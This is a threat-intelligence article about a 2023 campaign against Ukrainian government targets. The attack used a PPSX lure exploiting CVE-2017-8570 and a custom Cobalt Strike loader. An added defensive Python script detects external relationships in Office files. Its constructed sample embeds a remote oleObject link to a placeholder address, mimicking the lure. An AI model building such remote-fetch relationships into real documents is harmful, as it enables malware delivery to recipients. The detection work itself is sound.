The targeted operation utilized CVE-2017-8570 as the initial vector and employed a notable custom loader for Cobalt Strike, yet attribution to any known threat actor remains elusive. An unknown threat actor targeted government entities in Ukraine toward the end of 2023 using an old Microsoft Office remote code execution (RCE) exploit from 2017 (CVE-2017-8570) as the initial vector and military vehicles as the lure.
The threat actor initiated the attack with a malicious PowerPoint slideshow file (.PPSX) sent as an attachment in a message on the secure messaging platform Signal. The file masqueraded as an old US Army instruction manual for mine-clearing blades for tanks, but in fact contained a remote relationship, an external link inside the document package, pointing to a script hosted on a domain of a Russian virtual private server (VPS) provider and fronted by Cloudflare.
The script executed the CVE-2017-8570 exploit to achieve RCE, according to a Deep Instinct blog post on the attack last week, in an effort to steal information. On the technical side, the obfuscated script masqueraded as a Cisco AnyConnect APN configuration file and handled establishing persistence, decoding the embedded payload, and saving it to disk, in several stages to evade detection.[1]
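The lure described above only works because an Office document can carry a relationship whose target lies outside the package. An OOXML file (PPSX, PPTX, DOCX, XLSX) is a zip archive, and each part's relationships live in a `*.rels` XML part; a target outside the archive is marked `TargetMode="External"`. The following script, added here as an illustration and not taken from the article or from Deep Instinct's research, walks those parts and separates ordinary hyperlinks (which a user must click) from external relationships that Office resolves automatically when the part loads. The sample PPSX it scans is constructed in memory; the relationship type (`oleObject`), the TEST-NET address `203.0.113.10`, and the file names are placeholders, not indicators from the campaign.

```python
"""Triage an OOXML package for relationships that pull remote content.

Added example (not the article's or Deep Instinct's code). Assumptions: the
standard OOXML package layout, in which every part's relationships sit in a
sibling _rels/<part>.rels file; the constructed sample below uses placeholder
URLs and a placeholder oleObject relationship type.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespace of the package-relationships schema used by every *.rels part.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Prefix shared by the Office relationship-type URIs (hyperlink, oleObject, ...).
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# Targets that leave the package: web, FTP, file: and UNC paths.
REMOTE_RE = re.compile(r"^(?:https?://|ftp://|file:|\\\\)", re.IGNORECASE)


def find_external_relationships(data: bytes):
    """Return (rels_part, relationship_type, target) for every relationship in
    the package whose TargetMode is External. Only *.rels parts are parsed; the
    slide/sheet XML itself is never touched."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                # Keep only the last path segment of the type URI, e.g. "oleObject".
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                hits.append((name, rtype, rel.get("Target", "")))
    return hits


def triage(data: bytes):
    """Split external relationships into plain hyperlinks (user-clicked) and
    remote-content relationships (fetched by Office when the part loads).
    The second group is the one a remote-link lure depends on."""
    remote_content, hyperlinks = [], []
    for part, rtype, target in find_external_relationships(data):
        if rtype == "hyperlink":
            hyperlinks.append((part, target))
        elif REMOTE_RE.match(target):
            remote_content.append((part, rtype, target))
    return remote_content, hyperlinks


def build_sample_ppsx() -> bytes:
    """Constructed minimal PPSX (not a real sample): one slide whose rels part
    carries a remote oleObject relationship to a placeholder TEST-NET address,
    plus an ordinary hyperlink for contrast."""
    slide_rels = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OFFICE_REL}/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="{OFFICE_REL}/oleObject" Target="http://203.0.113.10/config.xml" TargetMode="External"/>
  <Relationship Id="rId3" Type="{OFFICE_REL}/hyperlink" Target="https://example.org/manual" TargetMode="External"/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("_rels/.rels", f'<Relationships xmlns="{REL_NS}"/>')
        zf.writestr("ppt/slides/slide1.xml", "<sld/>")
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", slide_rels)
    return buf.getvalue()


if __name__ == "__main__":
    remote, links = triage(build_sample_ppsx())
    for part, rtype, target in remote:
        print(f"REMOTE CONTENT  {part}: {rtype} -> {target}")
    for part, target in links:
        print(f"hyperlink       {part}: -> {target}")
```

Run against the constructed sample, the script flags the `oleObject` relationship to `203.0.113.10` as remote content and lists the `example.org` hyperlink separately. One caveat: this check only sees remote targets declared in `*.rels` parts. A document that embeds the hostile OLE object directly (the classic form of CVE-2017-8570, which needs no external link) would pass it, so pair it with a scan of embedded OLE streams rather than relying on it alone.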
The payload includes a loader/packer dynamic link library (DLL) named "vpn.sessings" that loads a Cobalt Strike Beacon into memory, where it awaits instructions from the attacker's command-and-control (C2) server.
Mark Vaitzman, threat lab team leader at Deep Instinct, notes that the penetration testing tool Cobalt Strike is very commonly used among threat actors, but this particular beacon makes use of a custom loader that relies on several techniques that slow down analysis. "It is continuously updated to provide attackers with a simple way to move laterally once the initial footprint is set," he says. "[And] it was implemented in several anti-analysis and unique evasion techniques."
Vaitzman notes that in 2022, a severe CVE allowing RCE was found in Cobalt Strike, and many researchers predicted that threat actors would alter the tool or create open source alternatives. "Several cracked versions can be found on underground hacking forums," he says. Beyond the tweaked version of Cobalt Strike, he reported, the campaign is also notable for the lengths to which the threat actors continuously attempt to masquerade their files and activity as legitimate, routine operating-system and common-application activity, to remain hidden and keep control of infected machines for as long as possible. In this campaign, he says, the attackers took this "living off the land" strategy further. "This attack campaign shows several masquerading techniques and a smart way of persistence that has not been documented yet," he explains, without divulging details.
Ukraine has been targeted by multiple threat actors on multiple occasions during its war with Russia, with the Sandworm Group serving as the aggressor's primary cyberattack unit.
But unlike in most attack campaigns during the war, the threat lab team could not link this effort to any known threat group, which may indicate that it is the work of a new group or a fully upgraded tool set of a known threat actor. Mayuresh Dani, manager of security research at Qualys Threat Research Unit, points out that the use of geographically disparate infrastructure, which helps the threat actors frustrate attribution, also makes it difficult for security teams to provide targeted protection based on geographic location. "The sample was uploaded from Ukraine, the second stage was hosted and registered under a Russian VPS provider, and the Cobalt beacon [C2] was registered in Warsaw, Poland," he explains. He says that what he found most interesting about the attack chain was that the initial compromise was accomplished via the secure Signal app. "The Signal messenger has been largely used by security-focused personnel or those who are involved in sharing clandestine information, such as journalists," he notes.
Vaitzman says that because most cyberattacks start with phishing or link-luring via emails or messages, broader employee cyber awareness plays an important role in mitigating such attack attempts. And for security teams, "We also recommend scanning for the provided IoCs in the network, as well as making sure that Office is patched to the latest version," Vaitzman says.
Callie Guenther, senior manager of cyber threat research at Critical Start, says that from a defense perspective, the reliance on older exploits also stresses the importance of robust patch management systems. "Additionally, the sophistication of the attack underscores the need for advanced detection mechanisms that go beyond signature-based cyber-defense approaches," she says, "incorporating behavior and anomaly detection to identify modified malicious software."
This article is presented at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com
Reporting: https://www.redskyalliance.org/
Website: https://www.redskyalliance.com/
LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings (REDSHORTS): https://register.gotowebinar.com/register/5378972949933166424
[1] https://www.darkreading.com/cyberattacks-data-breaches/military-tank-manual-zero-day-ukraine-cyberattack